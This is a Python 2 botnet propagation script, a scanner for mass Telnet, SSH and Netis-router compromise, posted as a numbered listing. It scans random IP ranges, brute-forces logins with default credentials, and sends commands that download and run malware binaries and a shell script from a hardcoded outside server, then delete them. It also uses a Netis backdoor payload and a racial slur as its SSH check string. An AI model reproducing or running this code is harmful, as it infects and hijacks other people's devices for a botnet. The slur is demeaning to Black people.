sadaad

1. #!/usr/bin/python
2. """
3. GoD-MuLTi-ScaNNeRv2(NeTiS/TeLNeT/SSH)
4. By; LiGhT
5. """
6. import threading, sys, time, random, socket, re, os, paramiko
7.  
8. if len(sys.argv) < 5:
9. print "GoD-MuLTi-ScaNNeR v2\n By: LiGhT"
10. print "Usage: python "+sys.argv[0]+" <threads(50-1000)> <ips per scan(100-10000)> <ssh pass list(1,2,3)> <ssh ranges(A,B,C,D)>\n"
11. print "Example: python "+sys.argv[0]+" 500 5000 1 A\n"
12. sys.exit()
13.  
14. # USER AND PASS LISTS #
15. usernames = ["root", "admin"] #DONT CHANGE
16. passwords = ["oelinux123", "admin"] #DONT CHANGE
17. if sys.argv[3] == "1":
18. ssh_passwords = ["admin:1234"]
19. elif sys.argv[3] == "2":
20. ssh_passwords = ["admin:admin","root:root"]
21. elif sys.argv[3] == "3":
22. ssh_passwords = ["admin:1234","root:root","root:1234","admin:admin"]
23.  
24. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
25.  
26.  
27. # START CONFIGURATION #
28. url = "http://64.137.172.53/82sr1" # ARM4 Binary
29. sh_file = "http://64.137.172.53/pewpew.sh" # SH File
30. commandpayload = "AA\x00\x00AAAA cd /var/; rm -rf 82sr5; wget http://64.137.172.53/82sr5 || tftp -r 82sr5 -g 64.137.172.53; chmod 777 82sr5; ./82sr5; rm -rf 82sr5\x00" # MIPSEL Binary
31.  
32. # DONT TOUCH
33. spawn_shell = "cat | sh"
34. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
35. threads = int(sys.argv[1])
36. h0h0 = int(sys.argv[2])
37. Tranges = ["119.150","119.151","119.152","119.153","119.154","119.155","119.156","119.157","119.158","119.159","182.189","182.190","182.191"]
38. if sys.argv[4] == "A":
39. Sranges = ["49.150","122.3","122.52","122.54","119.93","124.105","124.106","124.107","210.213"]
40. elif sys.argv[4] == "B":
41. Sranges = ["210.213","119.83","119.84","119.85","124.83","182.52","182.68","182.69","182.70"]
42. elif sys.argv[4] == "C":
43. Sranges = ["112.200","112.201","112.202","112.203","112.204","112.205","112.206","112.207","112.208","112.209","112.210","112.211","112.212","112.213","112.214"]
44. elif sys.argv[4] == "D":
45. Sranges = ["125.24","125.25","125.26","125.27","125.28","118.175","118.173","182.52"]
46. else:
47. Sranges = ["49.150","122.3","122.52","122.54","119.93","124.105","124.106","124.107","210.213"]
48. def readUntil(tn, string, timeout=8):
49. buf = ''
50. start_time = time.time()
51. while time.time() - start_time < timeout:
52. buf += tn.recv(1024)
53. time.sleep(0.01)
54. if string in buf: return buf
55. raise Exception('TIMEOUT!')
56.  
57. def worker():
58. try:
59. while True:
60. try:
61. h0h0h0 = h0h0 + 1
62. br = random.choice(Sranges)
63. for x in xrange(h0h0h0):
64. try:
65. ip = ''+br+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
66. ss = sssh(ip)
67. ss.start()
68. time.sleep(0.009)
69. except:
70. pass
71. br2 = random.choice(Tranges)
72. for y in xrange(h0h0h0):
73. try:
74. ip = ''+br2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
75. tt = ttelnet(ip)
76. tt.start()
77. time.sleep(0.009)
78. except:
79. pass
80. time.sleep(2)
81. except:
82. print "\033[31mWORKER ERROR\033[37m"
83. pass
84. except:
85. pass
86.  
87. class ttelnet(threading.Thread):
88. def __init__ (self, ip):
89. threading.Thread.__init__(self)
90. self.ip = str(ip).rstrip('\n')
91. def run(self):
92. try:
93. tn = socket.socket()
94. tn.settimeout(8)
95. tn.connect((self.ip,23))
96. except Exception:
97. pass
98. try:
99. hoho = ''
100. hoho += readUntil(tn, ":")
101. if "mdm9625" in hoho:
102. r00t = 0
103. username = usernames[1]
104. password = passwords[1]
105. tn.send(username + "\n")
106. elif "9615-cdp" in hoho:
107. r00t = 1
108. username = usernames[0]
109. password = passwords[0]
110. tn.send(username + "\n")
111. except Exception:
112. pass
113. try:
114. hoho = ''
115. hoho += readUntil(tn, ":")
116. if "assword" in hoho:
117. tn.send(password + "\n")
118. time.sleep(3.5)
119. except Exception:
120. pass
121. try:
122. mp = ''
123. mp += tn.recv(1024)
124. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
125. if r00t: tn.send("cd /tmp; rm -rf phone; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
126. if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] Command Sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
127. except Exception:
128. pass
129.  
130. class sssh(threading.Thread):
131. def __init__ (self, ip):
132. threading.Thread.__init__(self)
133. self.ip = str(ip).rstrip('\n')
134. def run(self):
135. x = 1
136. while x != 0:
137. try:
138. username='root'
139. password="0"
140. port = 22
141. ssh = paramiko.SSHClient()
142. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
143. dobreak=False
144. for passwd in ssh_passwords:
145. if ":n/a" in passwd:
146. password=""
147. else:
148. password=passwd.split(":")[1]
149. if "n/a:" in passwd:
150. username=""
151. else:
152. username=passwd.split(":")[0]
153. try:
154. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
155. dobreak=True
156. break
157. except:
158. pass
159. if True == dobreak:
160. break
161. badserver=True
162. stdin, stdout, stderr = ssh.exec_command("echo nigger")
163. output = stdout.read()
164. if "nigger" in output:
165. badserver=False
166. if badserver == False:
167. print "\033[36m[SSH] Command Sent %s!\033[37m"%(self.ip)
168. ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
169. time.sleep(10)
170. ssh.close()
171. x = 0
172. if badserver == True:
173. ssh.close()
174. except:
175. pass
176. x = 0
177.  
178. for g in xrange(threads):
179. try:
180. print "started %s thread"%(g)
181. t = threading.Thread(target=worker)
182. t.start()
183. time.sleep(0.002)
184. except:
185. pass